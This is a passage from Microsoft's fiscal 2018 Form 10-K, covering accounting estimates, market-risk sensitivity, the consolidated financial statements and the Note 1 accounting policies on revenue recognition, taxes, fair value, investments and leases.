The estimates used to calculate the fair value of a reporting unit change from year to year based on operating results, market conditions, and other factors. Changes in these estimates and assumptions could materially affect the determination of fair value and goodwill impairment for each reporting unit.

### Research and Development Costs

Costs incurred internally in researching and developing a computer software product are charged to expense until technological feasibility has been established for the product. Once technological feasibility is established, all software costs are capitalized until the product is available for general release to customers. Judgment is required in determining when technological feasibility of a product is established. We have determined that technological feasibility for our software products is reached after all high-risk development issues have been resolved through coding and testing. Generally, this occurs shortly before the products are released to production. The amortization of these costs is included in cost of revenue over the estimated life of the products.

### Legal and Other Contingencies

The outcomes of legal proceedings and claims brought against us are subject to significant uncertainty. An estimated loss from a loss contingency such as a legal proceeding or claim is accrued by a charge to income if it is probable that an asset has been impaired or a liability has been incurred and the amount of the loss can be reasonably estimated. In determining whether a loss should be accrued we evaluate, among other factors, the degree of probability of an unfavorable outcome and the ability to make a reasonable estimate of the amount of loss. Changes in these factors could materially impact our consolidated financial statements.

### Income Taxes

The objectives of accounting for income taxes are to recognize the amount of taxes payable or refundable for the current year, and deferred tax liabilities and assets for the future tax consequences of events that have been recognized in an entity's financial statements or tax returns. We recognize the tax benefit from an uncertain tax position only if it is more likely than not that the tax position will be sustained on examination by the taxing authorities, based on the technical merits of the position. The tax benefits recognized in the financial statements from such a position are measured based on the largest benefit that has a greater than 50% likelihood of being realized upon ultimate settlement. Accounting literature also provides guidance on derecognition of income tax assets and liabilities, classification of deferred income tax assets and liabilities, accounting for interest and penalties associated with tax positions, and income tax disclosures. Judgment is required in assessing the future tax consequences of events that have been recognized in our consolidated financial statements or tax returns. Variations in the actual outcome of these future tax consequences could materially impact our consolidated financial statements.

The TCJA significantly changes existing U.S. tax law and includes numerous provisions that affect our business. Refer to Note 13 – Income Taxes of the Notes to Financial Statements (Part II, Item 8 of this Form 10-K) for further discussion.

**Inventories**

Inventories are stated at average cost, subject to the lower of cost or net realizable value. Cost includes materials, labor, and manufacturing overhead related to the purchase and production of inventories. Net realizable value is the estimated selling price less estimated costs of completion, disposal, and transportation. We regularly review inventory quantities on hand, future purchase commitments with our suppliers, and the estimated utility of our inventory. These reviews include analysis of demand forecasts, product life cycle status, product development plans, current sales levels, pricing strategy, and component cost trends. If our review indicates a reduction in utility below carrying value, we reduce our inventory to a new cost basis through a charge to cost of revenue.

**STATEMENT OF MANAGEMENT'S RESPONSIBILITY FOR FINANCIAL STATEMENTS**

Management is responsible for the preparation of the consolidated financial statements and related information that are presented in this report. The consolidated financial statements, which include amounts based on management's estimates and judgments, have been prepared in conformity with accounting principles generally accepted in the United States of America.

The Company designs and maintains accounting and internal control systems to provide reasonable assurance at reasonable cost that assets are safeguarded against loss from unauthorized use or disposition, and that the financial records are reliable for preparing consolidated financial statements and maintaining accountability for assets. These systems are augmented by written policies, an organizational structure providing division of responsibilities, careful selection and training of qualified personnel, and a program of internal audits.

The Company engaged Deloitte & Touche LLP, an independent registered public accounting firm, to audit and render an opinion on the consolidated financial statements and internal control over financial reporting in accordance with the standards of the Public Company Accounting Oversight Board (United States).

The Board of Directors, through its Audit Committee, consisting solely of independent directors of the Company, meets periodically with management, internal auditors, and our independent registered public accounting firm to ensure that each is meeting its responsibilities and to discuss matters concerning internal controls and financial reporting. Deloitte & Touche LLP and the internal auditors each have full and free access to the Audit Committee.

Satya Nadella
Chief Executive Officer

Amy E. Hood
Executive Vice President and Chief Financial Officer

Frank H. Brod
Corporate Vice President, Finance and Administration;
Chief Accounting Officer

## ITEM 7A. QUANTITATIVE AND QUALITATIVE DISCLOSURES ABOUT MARKET RISK

RISKS

We are exposed to economic risk from foreign exchange rates, interest rates, credit risk, and equity prices. We use derivatives instruments to manage these risks, however, they may still impact our consolidated financial statements.

**Foreign Currency**

Certain forecasted transactions, assets, and liabilities are exposed to foreign currency risk. We monitor our foreign currency exposures daily to maximize the economic effectiveness of our foreign currency positions. Principal currencies hedged include the euro, Japanese yen, British pound, Canadian dollar, and Australian dollar.

**Interest Rate**

Securities held in our fixed-income portfolio are subject to different interest rate risks based on their maturities. We manage the average maturity of the fixed-income portfolio to achieve economic returns that correlate to certain global fixed-income indices.

**Credit**

Our fixed-income portfolio is diversified and consists primarily of investment-grade securities. We manage credit exposures relative to broad-based indices and to facilitate portfolio diversification.

**Equity**

Securities held in our equity and other investments portfolio are subject to market price risk.

SENSITIVITY ANALYSIS

Historically, we used a value-at-risk ("VaR") model to estimate and quantify our market risks. This included presenting one-day VaR as well as average, high, and low VaR by risk category throughout the reporting period. Given the changes in size and allocation of our portfolio of financial assets, we believe sensitivity analysis is more informative in representing the potential impact to the portfolio as a result of market movements. Therefore, we have presented a sensitivity analysis for each risk category below.

Sensitivity analysis is not intended to represent actual losses in fair value, including determinations of other-than-temporary losses in fair value in accordance with accounting principles generally accepted in the United States of America, but is used as a risk estimation and management tool.

The following table sets forth the potential loss in future earnings or fair values, including associated derivatives, resulting from hypothetical changes in relevant market rates or prices:

(In millions)

| Risk Categories | Hypothetical Change | June 30, 2018 | June 30, 2017 | Impact |
|---|---|---|---|---|
| Foreign currency - Revenue | 10% decrease in foreign exchange rates | $ (2,187) | $ (1,785) | Earnings |
| Foreign currency - Investments | 10% decrease in foreign exchange rates | (70) | (92) | Fair Value |
| Interest rate | 100 basis point increase in U.S. treasury interest rates | (2,705) | (2,394) | Fair Value |
| Credit | 100 basis point increase in credit spreads | (232) | (167) | Fair Value |
| Equity | 10% decrease in equity market prices | (140) | (323) | Fair Value |

# ITEM 8. FINANCIAL STATEMENTS AND SUPPLEMENTARY DATA

## INCOME STATEMENTS

(In millions, except per share amounts)

| Year Ended June 30, | 2018 | 2017 | 2016 |
|---|---|---|---|
| Revenue: | | | |
| Product | $ 64,497 | $ 63,811 | $ 67,336 |
| Service and other | 45,863 | 32,760 | 23,818 |
| Total revenue | 110,360 | 96,571 | 91,154 |
| Cost of revenue: | | | |
| Product | 15,420 | 15,175 | 17,880 |
| Service and other | 22,933 | 19,086 | 14,900 |
| Total cost of revenue | 38,353 | 34,261 | 32,780 |
| Gross margin | 72,007 | 62,310 | 58,374 |
| Research and development | 14,726 | 13,037 | 11,988 |
| Sales and marketing | 17,469 | 15,461 | 14,635 |
| General and administrative | 4,754 | 4,481 | 4,563 |
| Impairment and restructuring | 0 | 306 | 1,110 |
| Operating income | 35,058 | 29,025 | 26,078 |
| Other income (expense), net | 1,416 | 876 | (439) |
| Income before income taxes | 36,474 | 29,901 | 25,639 |
| Provision for income taxes | 19,903 | 4,412 | 5,100 |
| Net income | $ 16,571 | $ 25,489 | $ 20,539 |
| Earnings per share: | | | |
| Basic | $ 2.15 | $ 3.29 | $ 2.59 |
| Diluted | $ 2.13 | $ 3.25 | $ 2.56 |
| Weighted average shares outstanding: | | | |
| Basic | 7,700 | 7,746 | 7,925 |
| Diluted | 7,794 | 7,832 | 8,013 |
| Cash dividends declared per common share | $ 1.68 | $ 1.56 | $ 1.44 |

Refer to accompanying notes.

## COMPREHENSIVE INCOME STATEMENTS

**(In millions)**

| Year Ended June 30, | 2018 | 2017 | 2016 |
|---|---|---|---|
| Net income | $ **16,571** | $ 25,489 | $ 20,539 |
| | | | |
| Other comprehensive income (loss), net of tax: | | | |
| Net change related to derivatives | **39** | (218) | (238) |
| Net change related to investments | **(2,717)** | (1,116) | (228) |
| Translation adjustments and other | **(178)** | 167 | (262) |
| Other comprehensive loss | **(2,856)** | (1,167) | (728) |
| Comprehensive income | $ **13,715** | $ 24,322 | $ 19,811 |

Refer to accompanying notes. Refer to Note 19 – Accumulated Other Comprehensive Income (Loss) for further information.

# BALANCE SHEETS

(In millions)

| June 30, | 2018 | 2017 |
|---|---:|---:|
| **Assets** | | |
| Current assets: | | |
| Cash and cash equivalents | $ **11,946** | $ 7,663 |
| Short-term investments | **121,822** | 125,318 |
| Total cash, cash equivalents, and short-term investments | **133,768** | 132,981 |
| Accounts receivable, net of allowance for doubtful accounts of **$377** and $345 | **26,481** | 22,431 |
| Inventories | **2,662** | 2,181 |
| Other | **6,751** | 5,103 |
| Total current assets | **169,662** | 162,696 |
| Property and equipment, net of accumulated depreciation of **$29,223** and $24,179 | **29,460** | 23,734 |
| Operating lease right-of-use assets | **6,686** | 6,555 |
| Equity and other investments | **1,862** | 6,023 |
| Goodwill | **35,683** | 35,122 |
| Intangible assets, net | **8,053** | 10,106 |
| Other long-term assets | **7,442** | 6,076 |
| Total assets | $ **258,848** | $ 250,312 |
| **Liabilities and stockholders' equity** | | |
| Current liabilities: | | |
| Accounts payable | $ **8,617** | $ 7,390 |
| Short-term debt | **0** | 9,072 |
| Current portion of long-term debt | **3,998** | 1,049 |
| Accrued compensation | **6,103** | 5,819 |
| Short-term income taxes | **2,121** | 718 |
| Short-term unearned revenue | **28,905** | 24,013 |
| Other | **8,744** | 7,684 |
| Total current liabilities | **58,488** | 55,745 |
| Long-term debt | **72,242** | 76,073 |
| Long-term income taxes | **30,265** | 13,485 |
| Long-term unearned revenue | **3,815** | 2,643 |
| Deferred income taxes | **541** | 5,734 |
| Operating lease liabilities | **5,568** | 5,372 |
| Other long-term liabilities | **5,211** | 3,549 |
| Total liabilities | **176,130** | 162,601 |
| Commitments and contingencies | | |
| Stockholders' equity: | | |
| Common stock and paid-in capital – shares authorized 24,000; outstanding **7,677** and 7,708 | **71,223** | 69,315 |
| Retained earnings | **13,682** | 17,769 |
| Accumulated other comprehensive income (loss) | **(2,187)** | 627 |
| Total stockholders' equity | **82,718** | 87,711 |
| Total liabilities and stockholders' equity | $ **258,848** | $ 250,312 |

Refer to accompanying notes.

PART II
Item 8

## CASH FLOWS STATEMENTS

(In millions)

| Year Ended June 30, | 2018 | 2017 | 2016 |
|---|---|---|---|
| **Operations** | | | |
| Net income | $ **16,571** | $ 25,489 | $ 20,539 |
| Adjustments to reconcile net income to net cash from operations: | | | |
| Asset impairments | **0** | 0 | 630 |
| Depreciation, amortization, and other | **10,261** | 8,778 | 6,622 |
| Stock-based compensation expense | **3,940** | 3,266 | 2,668 |
| Net recognized gains on investments and derivatives | **(2,212)** | (2,073) | (223) |
| Deferred income taxes | **(5,143)** | (829) | 2,479 |
| Changes in operating assets and liabilities: | | | |
| Accounts receivable | **(3,862)** | (1,216) | 562 |
| Inventories | **(465)** | 50 | 600 |
| Other current assets | **(952)** | 1,028 | (1,212) |
| Other long-term assets | **(285)** | (917) | (1,110) |
| Accounts payable | **1,148** | 81 | 88 |
| Unearned revenue | **5,922** | 3,820 | 2,565 |
| Income taxes | **18,183** | 1,792 | (298) |
| Other current liabilities | **798** | 356 | (179) |
| Other long-term liabilities | **(20)** | (118) | (406) |
| Net cash from operations | **43,884** | 39,507 | 33,325 |
| **Financing** | | | |
| Proceeds from issuance (repayments) of short-term debt, maturities of 90 days or less, net | **(7,324)** | (4,963) | 7,195 |
| Proceeds from issuance of debt | **7,183** | 44,344 | 13,884 |
| Repayments of debt | **(10,060)** | (7,922) | (2,796) |
| Common stock issued | **1,002** | 772 | 668 |
| Common stock repurchased | **(10,721)** | (11,788) | (15,969) |
| Common stock cash dividends paid | **(12,699)** | (11,845) | (11,006) |
| Other, net | **(971)** | (190) | (369) |
| Net cash from (used in) financing | **(33,590)** | 8,408 | (8,393) |
| **Investing** | | | |
| Additions to property and equipment | **(11,632)** | (8,129) | (8,343) |
| Acquisition of companies, net of cash acquired, and purchases of intangible and other assets | **(888)** | (25,944) | (1,393) |
| Purchases of investments | **(137,380)** | (176,905) | (129,758) |
| Maturities of investments | **26,360** | 28,044 | 22,054 |
| Sales of investments | **117,577** | 136,350 | 93,287 |
| Securities lending payable | **(98)** | (197) | 203 |
| Net cash used in investing | **(6,061)** | (46,781) | (23,950) |
| Effect of foreign exchange rates on cash and cash equivalents | **50** | 19 | (67) |
| Net change in cash and cash equivalents | **4,283** | 1,153 | 915 |
| Cash and cash equivalents, beginning of period | **7,663** | 6,510 | 5,595 |
| Cash and cash equivalents, end of period | $ **11,946** | $ 7,663 | $ 6,510 |

Refer to accompanying notes.

## STOCKHOLDERS' EQUITY STATEMENTS

(In millions)

| Year Ended June 30, | | 2018 | 2017 | 2016 |
|---|---|---:|---:|---:|
| **Common stock and paid-in capital** | | | | |
| Balance, beginning of period | $ | **69,315** | $ 68,178 | $ 68,465 |
| Common stock issued | | **1,002** | 772 | 668 |
| Common stock repurchased | | **(3,033)** | (2,987) | (3,689) |
| Stock-based compensation expense | | **3,940** | 3,266 | 2,668 |
| Other, net | | **(1)** | 86 | 66 |
| Balance, end of period | | **71,223** | 69,315 | 68,178 |
| **Retained earnings** | | | | |
| Balance, beginning of period | | **17,769** | 13,118 | 16,191 |
| Net income | | **16,571** | 25,489 | 20,539 |
| Common stock cash dividends | | **(12,917)** | (12,040) | (11,329) |
| Common stock repurchased | | **(7,699)** | (8,798) | (12,283) |
| Cumulative effect of accounting change | | **(42)** | 0 | 0 |
| Balance, end of period | | **13,682** | 17,769 | 13,118 |
| **Accumulated other comprehensive income (loss)** | | | | |
| Balance, beginning of period | | **627** | 1,794 | 2,522 |
| Other comprehensive loss | | **(2,856)** | (1,167) | (728) |
| Cumulative effect of accounting change | | **42** | 0 | 0 |
| Balance, end of period | | **(2,187)** | 627 | 1,794 |
| Total stockholders' equity | $ | **82,718** | $ 87,711 | $ 83,090 |

Refer to accompanying notes.

## NOTES TO FINANCIAL STATEMENTS

### NOTE 1 — ACCOUNTING POLICIES

**Accounting Principles**

Our consolidated financial statements and accompanying notes are prepared in accordance with accounting principles generally accepted in the United States of America ("GAAP").

We have recast certain prior period income tax liabilities as discussed in the Recent Tax Legislation section below. We have also recast prior period securities lending payables to other current liabilities in our consolidated balance sheets to conform to the current period presentation. These items had no impact in our consolidated income statements or net cash from or used in operating, financing, or investing in our consolidated cash flows statements.

**Principles of Consolidation**

The consolidated financial statements include the accounts of Microsoft Corporation and its subsidiaries. Intercompany transactions and balances have been eliminated. Equity investments for which we are able to exercise significant influence over but do not control the investee and are not the primary beneficiary of the investee's activities are accounted for using the equity method. Investments for which we are not able to exercise significant influence over the investee and which do not have readily determinable fair values are accounted for under the cost method.

**Estimates and Assumptions**

Preparing financial statements requires management to make estimates and assumptions that affect the reported amounts of assets, liabilities, revenue, and expenses. Examples of estimates and assumptions include: for revenue recognition, determining the nature and timing of satisfaction of performance obligations, and determining the standalone selling price ("SSP") of performance obligations, variable consideration, and other obligations such as product returns and refunds; loss contingencies; product warranties; the fair value of and/or potential impairment of goodwill and intangible assets for our reporting units; product life cycles; useful lives of our tangible and intangible assets; allowances for doubtful accounts; the market value of, and demand for, our inventory; stock-based compensation forfeiture rates; when technological feasibility is achieved for our products; the potential outcome of future tax consequences of events that have been recognized in our consolidated financial statements or tax returns; and determining when investment impairments are other-than-temporary. Actual results and outcomes may differ from management's estimates and assumptions.

**Foreign Currencies**

Assets and liabilities recorded in foreign currencies are translated at the exchange rate on the balance sheet date. Revenue and expenses are translated at average rates of exchange prevailing during the year. Translation adjustments resulting from this process are recorded to other comprehensive income ("OCI").

**Revenue**

***Product Revenue and Service and Other Revenue***

Product revenue includes sales from operating systems; cross-device productivity applications; server applications; business solution applications; desktop and server management tools; software development tools; video games; and hardware such as PCs, tablets, gaming and entertainment consoles, other intelligent devices, and related accessories.

Service and other revenue includes sales from cloud-based solutions that provide customers with software, services, platforms, and content such as Microsoft Office 365, Microsoft Azure, Microsoft Dynamics 365, and Xbox Live; solution support; and consulting services. Service and other revenue also includes sales from online advertising and LinkedIn.

*Revenue Recognition*

Revenue is recognized upon transfer of control of promised products or services to customers in an amount that reflects the consideration we expect to receive in exchange for those products or services. We enter into contracts that can include various combinations of products and services, which are generally capable of being distinct and accounted for as separate performance obligations. Revenue is recognized net of allowances for returns and any taxes collected from customers, which are subsequently remitted to governmental authorities.

*Nature of Products and Services*

Licenses for on-premises software provide the customer with a right to use the software as it exists when made available to the customer. Customers may purchase perpetual licenses or subscribe to licenses, which provide customers with the same functionality and differ mainly in the duration over which the customer benefits from the software. Revenue from distinct on-premises licenses is recognized upfront at the point in time when the software is made available to the customer. In cases where we allocate revenue to software updates, primarily because the updates are provided at no additional charge, revenue is recognized as the updates are provided, which is generally ratably over the estimated life of the related device or license.

Certain volume licensing programs, including Enterprise Agreements, include on-premises licenses combined with Software Assurance ("SA"). SA conveys rights to new software and upgrades released over the contract period and provides support, tools, and training to help customers deploy and use products more efficiently. On-premises licenses are considered distinct performance obligations when sold with SA. Revenue allocated to SA is generally recognized ratably over the contract period as customers simultaneously consume and receive benefits, given that SA comprises distinct performance obligations that are satisfied over time.

Cloud services, which allow customers to use hosted software over the contract period without taking possession of the software, are provided on either a subscription or consumption basis. Revenue related to cloud services provided on a subscription basis is recognized ratably over the contract period. Revenue related to cloud services provided on a consumption basis, such as the amount of storage used in a period, is recognized based on the customer utilization of such resources. When cloud services require a significant level of integration and interdependency with software and the individual components are not considered distinct, all revenue is recognized over the period in which the cloud services are provided.

Revenue from search advertising is recognized when the advertisement appears in the search results or when the action necessary to earn the revenue has been completed. Revenue from consulting services is recognized as services are provided.

Our hardware is generally highly dependent on, and interrelated with, the underlying operating system and cannot function without the operating system. In these cases, the hardware and software license are accounted for as a single performance obligation and revenue is recognized at the point in time when ownership is transferred to resellers or directly to end customers through retail stores and online marketplaces.

Refer to Note 21 – Segment Information and Geographic Data for further information, including revenue by significant product and service offering.

*Significant Judgments*

Our contracts with customers often include promises to transfer multiple products and services to a customer. Determining whether products and services are considered distinct performance obligations that should be accounted for separately versus together may require significant judgment. When a cloud-based service includes both on-premises software licenses and cloud services, judgment is required to determine whether the software license is considered distinct and accounted for separately, or not distinct and accounted for together with the cloud service and recognized over time. Certain cloud services, primarily Office 365, depend on a significant level of integration, interdependency, and interrelation between the desktop applications and cloud services, and are accounted for together as one performance obligation. Revenue from Office 365 is recognized ratably over the period in which the cloud services are provided.

Judgment is required to determine the SSP for each distinct performance obligation. We use a single amount to estimate SSP for items that are not sold separately, including on-premises licenses sold with SA or software updates provided at no additional charge. We use a range of amounts to estimate SSP when we sell each of the products and

services separately and need to determine whether there is a discount to be allocated based on the relative SSP of the various products and services.

In instances where SSP is not directly observable, such as when we do not sell the product or service separately, we determine the SSP using information that may include market conditions and other observable inputs. We typically have more than one SSP for individual products and services due to the stratification of those products and services by customers and circumstances. In these instances, we may use information such as the size of the customer and geographic region in determining the SSP.

Due to the various benefits from and the nature of our SA program, judgment is required to assess the pattern of delivery, including the exercise pattern of certain benefits across our portfolio of customers.

Our products are generally sold with a right of return, we may provide other credits or incentives, and in certain instances we estimate customer usage of our products and services, which are accounted for as variable consideration when determining the amount of revenue to recognize. Returns and credits are estimated at contract inception and updated at the end of each reporting period if additional information becomes available. Changes to our estimated variable consideration were not material for the periods presented.

### Contract Balances

Timing of revenue recognition may differ from the timing of invoicing to customers. We record a receivable when revenue is recognized prior to invoicing, or unearned revenue when revenue is recognized subsequent to invoicing. For multi-year agreements, we generally invoice customers annually at the beginning of each annual coverage period. We record a receivable related to revenue recognized for multi-year on-premises licenses as we have an unconditional right to invoice and receive payment in the future related to those licenses.

The opening balance of current and long-term accounts receivable, net of allowance for doubtful accounts, was $22.3 billion as of July 1, 2016.

As of June 30, 2018 and 2017, long-term accounts receivable, net of allowance for doubtful accounts, were $1.8 billion and $1.7 billion, respectively, and are included in other long-term assets in our consolidated balance sheets.

The allowance for doubtful accounts reflects our best estimate of probable losses inherent in the accounts receivable balance. We determine the allowance based on known troubled accounts, historical experience, and other currently available evidence.

Activity in the allowance for doubtful accounts was as follows:

(In millions)

| Year Ended June 30, | 2018 | 2017 | 2016 |
|---|---|---|---|
| Balance, beginning of period | $ 361 | $ 409 | $ 289 |
| Charged to costs and other | 134 | 58 | 175 |
| Write-offs | (98) | (106) | (55) |
| Balance, end of period | $ 397 | $ 361 | $ 409 |

Allowance for doubtful accounts included in our consolidated balance sheets:

| June 30, | 2018 | 2017 | 2016 |
|---|---|---|---|
| Accounts receivable, net of allowance for doubtful accounts | $ 377 | $ 345 | $ 392 |
| Other long-term assets | 20 | 16 | 17 |
| Total | $ 397 | $ 361 | $ 409 |

Unearned revenue comprises mainly unearned revenue related to volume licensing programs, which may include SA and cloud services. Unearned revenue is generally invoiced annually at the beginning of each contract period for multi-year agreements and recognized ratably over the coverage period. Unearned revenue also includes payments for consulting services to be performed in the future; LinkedIn subscriptions; Office 365 subscriptions; Xbox Live subscriptions; Windows 10 post-delivery support; Dynamics business solutions; Skype prepaid credits and

subscriptions; and other offerings for which we have been paid in advance and earn the revenue when we transfer control of the product or service.

Refer to Note 15 – Unearned Revenue for further information, including unearned revenue by segment and changes in unearned revenue during the period.

Payment terms and conditions vary by contract type, although terms generally include a requirement of payment within 30 to 60 days. In instances where the timing of revenue recognition differs from the timing of invoicing, we have determined our contracts generally do not include a significant financing component. The primary purpose of our invoicing terms is to provide customers with simplified and predictable ways of purchasing our products and services, not to receive financing from our customers or to provide customers with financing. Examples include invoicing at the beginning of a subscription term with revenue recognized ratably over the contract period, and multi-year on-premises licenses that are invoiced annually with revenue recognized upfront.

### *Assets Recognized from Costs to Obtain a Contract with a Customer*

We recognize an asset for the incremental costs of obtaining a contract with a customer if we expect the benefit of those costs to be longer than one year. We have determined that certain sales incentive programs meet the requirements to be capitalized. Total capitalized costs to obtain a contract were immaterial during the periods presented and are included in other current and long-term assets in our consolidated balance sheets.

We apply a practical expedient to expense costs as incurred for costs to obtain a contract with a customer when the amortization period would have been one year or less. These costs include our internal sales force compensation program and certain partner sales incentive programs as we have determined annual compensation is commensurate with annual sales activities.

### Cost of Revenue

Cost of revenue includes: manufacturing and distribution costs for products sold and programs licensed; operating costs related to product support service centers and product distribution centers; costs incurred to include software on PCs sold by original equipment manufacturers ("OEM"), to drive traffic to our websites, and to acquire online advertising space; costs incurred to support and maintain Internet-based products and services, including datacenter costs and royalties; warranty costs; inventory valuation adjustments; costs associated with the delivery of consulting services; and the amortization of capitalized software development costs. Capitalized software development costs are amortized over the estimated lives of the products.

### Product Warranty

We provide for the estimated costs of fulfilling our obligations under hardware and software warranties at the time the related revenue is recognized. For hardware warranties, we estimate the costs based on historical and projected product failure rates, historical and projected repair costs, and knowledge of specific product failures (if any). The specific hardware warranty terms and conditions vary depending upon the product sold and the country in which we do business, but generally include parts and labor over a period generally ranging from 90 days to three years. For software warranties, we estimate the costs to provide bug fixes, such as security patches, over the estimated life of the software. We regularly reevaluate our estimates to assess the adequacy of the recorded warranty liabilities and adjust the amounts as necessary.

### Research and Development

Research and development expenses include payroll, employee benefits, stock-based compensation expense, and other headcount-related expenses associated with product development. Research and development expenses also include third-party development and programming costs, localization costs incurred to translate software for international markets, and the amortization of purchased software code and services content. Such costs related to software development are included in research and development expense until the point that technological feasibility is reached, which for our software products, is generally shortly before the products are released to production. Once technological feasibility is reached, such costs are capitalized and amortized to cost of revenue over the estimated lives of the products.

## Sales and Marketing

Sales and marketing expenses include payroll, employee benefits, stock-based compensation expense, and other headcount-related expenses associated with sales and marketing personnel, and the costs of advertising, promotions, trade shows, seminars, and other programs. Advertising costs are expensed as incurred. Advertising expense was $1.6 billion, $1.5 billion, and $1.6 billion in fiscal years 2018, 2017, and 2016, respectively.

## Stock-Based Compensation

Compensation cost for stock awards, which include restricted stock units ("RSUs") and performance stock units ("PSUs"), is measured at the fair value on the grant date and recognized as expense, net of estimated forfeitures, over the related service or performance period. The fair value of stock awards is based on the quoted price of our common stock on the grant date less the present value of expected dividends not received during the vesting period. We measure the fair value of PSUs using a Monte Carlo valuation model. Compensation cost for RSUs is recognized using the straight-line method and for PSUs is recognized using the accelerated method.

Compensation expense for the employee stock purchase plan ("ESPP") is measured as the discount the employee is entitled to upon purchase and is recognized in the period of purchase.

## Income Taxes

Income tax expense includes U.S. and international income taxes, and interest and penalties on uncertain tax positions. Certain income and expenses are not reported in tax returns and financial statements in the same year. The tax effect of such temporary differences is reported as deferred income taxes. Deferred tax assets are reported net of a valuation allowance when it is more likely than not that a tax benefit will not be realized. All deferred income taxes are classified as long-term in our consolidated balance sheets.

## Fair Value Measurements

We account for certain assets and liabilities at fair value. The hierarchy below lists three levels of fair value based on the extent to which inputs used in measuring fair value are observable in the market. We categorize each of our fair value measurements in one of these three levels based on the lowest level input that is significant to the fair value measurement in its entirety. These levels are:

- *Level 1* – inputs are based upon unadjusted quoted prices for identical instruments in active markets. Our Level 1 non-derivative investments primarily include U.S. government securities, common and preferred stock, and mutual funds. Our Level 1 derivative assets and liabilities include those actively traded on exchanges.

- *Level 2* – inputs are based upon quoted prices for similar instruments in active markets, quoted prices for identical or similar instruments in markets that are not active, and model-based valuation techniques (e.g. the Black-Scholes model) for which all significant inputs are observable in the market or can be corroborated by observable market data for substantially the full term of the assets or liabilities. Where applicable, these models project future cash flows and discount the future amounts to a present value using market-based observable inputs including interest rate curves, credit spreads, foreign exchange rates, and forward and spot prices for currencies. Our Level 2 non-derivative investments consist primarily of corporate notes and bonds, foreign government bonds, mortgage- and asset-backed securities, commercial paper, certificates of deposit, and U.S. agency securities. Our Level 2 derivative assets and liabilities primarily include certain over-the-counter option and swap contracts.

- *Level 3* – inputs are generally unobservable and typically reflect management's estimates of assumptions that market participants would use in pricing the asset or liability. The fair values are therefore determined using model-based techniques, including option pricing models and discounted cash flow models. Our Level 3 non-derivative assets and liabilities primarily comprise investments in common and preferred stock, and goodwill and intangible assets, when they are recorded at fair value due to an impairment charge. Unobservable inputs used in the models are significant to the fair values of the assets and liabilities.

We measure certain assets, including our cost and equity method investments, at fair value on a nonrecurring basis when they are deemed to be other-than-temporarily impaired. The fair values of these investments are determined based on valuation techniques using the best information available, and may include quoted market prices, market comparables, and discounted cash flow projections. An impairment charge is recorded when the cost of the investment exceeds its fair value and this condition is determined to be other-than-temporary.

Our other current financial assets and current financial liabilities have fair values that approximate their carrying values.

**Financial Instruments**

*Investments*

We consider all highly liquid interest-earning investments with a maturity of three months or less at the date of purchase to be cash equivalents. The fair values of these investments approximate their carrying values. In general, investments with original maturities of greater than three months and remaining maturities of less than one year are classified as short-term investments. Investments with maturities beyond one year may be classified as short-term based on their highly liquid nature and because such marketable securities represent the investment of cash that is available for current operations. All cash equivalents and short-term investments are classified as available-for-sale and realized gains and losses are recorded using the specific identification method. Changes in market value, excluding other-than-temporary impairments, are reflected in OCI.

Equity and other investments classified as long-term include both debt and equity instruments. Debt and publicly-traded equity securities are classified as available-for-sale and realized gains and losses are recorded using the specific identification method. Changes in the market value of available-for-sale securities, excluding other-than-temporary impairments, are reflected in OCI. Common and preferred stock and other investments that are restricted for more than one year or are not publicly traded are recorded at cost or using the equity method.

We lend certain fixed-income and equity securities to increase investment returns. These transactions are accounted for as secured borrowings and the loaned securities continue to be carried as investments in our consolidated balance sheets. Cash and/or security interests are received as collateral for the loaned securities with the amount determined based upon the underlying security lent and the creditworthiness of the borrower. Cash received is recorded as an asset with a corresponding liability.

Investments are considered to be impaired when a decline in fair value is judged to be other-than-temporary. Fair value is calculated based on publicly available market information or other estimates determined by management. We employ a systematic methodology on a quarterly basis that considers available quantitative and qualitative evidence in evaluating potential impairment of our investments. If the cost of an investment exceeds its fair value, we evaluate, among other factors, general market conditions, credit quality of debt instrument issuers, the duration and extent to which the fair value is less than cost, and for equity securities, our intent and ability to hold, or plans to sell, the investment. For fixed-income securities, we also evaluate whether we have plans to sell the security or it is more likely than not that we will be required to sell the security before recovery. We also consider specific adverse conditions related to the financial health of and business outlook for the investee, including industry and sector performance, changes in technology, and operational and financing cash flow factors. Once a decline in fair value is determined to be other-than-temporary, an impairment charge is recorded to other income (expense), net and a new cost basis in the investment is established.

*Derivatives*

Derivative instruments are recognized as either assets or liabilities and are measured at fair value. The accounting for changes in the fair value of a derivative depends on the intended use of the derivative and the resulting designation.

For derivative instruments designated as fair value hedges, the gains (losses) are recognized in earnings in the periods of change together with the offsetting losses (gains) on the hedged items attributed to the risk being hedged. For options designated as fair value hedges, changes in the time value are excluded from the assessment of hedge effectiveness and are recognized in earnings.

For derivative instruments designated as cash flow hedges, the effective portion of the gains (losses) on the derivatives is initially reported as a component of OCI and is subsequently recognized in earnings when the hedged exposure is recognized in earnings. For options designated as cash flow hedges, changes in the time value are excluded from the assessment of hedge effectiveness and are recognized in earnings. Gains (losses) on derivatives representing either hedge components excluded from the assessment of effectiveness or hedge ineffectiveness are recognized in earnings.

For derivative instruments that are not designated as hedges, gains (losses) from changes in fair values are primarily recognized in other income (expense), net.

### Inventories

Inventories are stated at average cost, subject to the lower of cost or net realizable value. Cost includes materials, labor, and manufacturing overhead related to the purchase and production of inventories. Net realizable value is the estimated selling price less estimated costs of completion, disposal, and transportation. We regularly review inventory quantities on hand, future purchase commitments with our suppliers, and the estimated utility of our inventory. If our review indicates a reduction in utility below carrying value, we reduce our inventory to a new cost basis through a charge to cost of revenue.

### Property and Equipment

Property and equipment is stated at cost less accumulated depreciation, and depreciated using the straight-line method over the shorter of the estimated useful life of the asset or the lease term. The estimated useful lives of our property and equipment are generally as follows: computer software developed or acquired for internal use, three to seven years; computer equipment, two to three years; buildings and improvements, five to 15 years; leasehold improvements, three to 20 years; and furniture and equipment, one to 10 years. Land is not depreciated.

### Leases

We determine if an arrangement is a lease at inception. Operating leases are included in operating lease right-of-use ("ROU") assets, other current liabilities, and operating lease liabilities in our consolidated balance sheets. Finance leases are included in property and equipment, other current liabilities, and other long-term liabilities in our consolidated balance sheets.

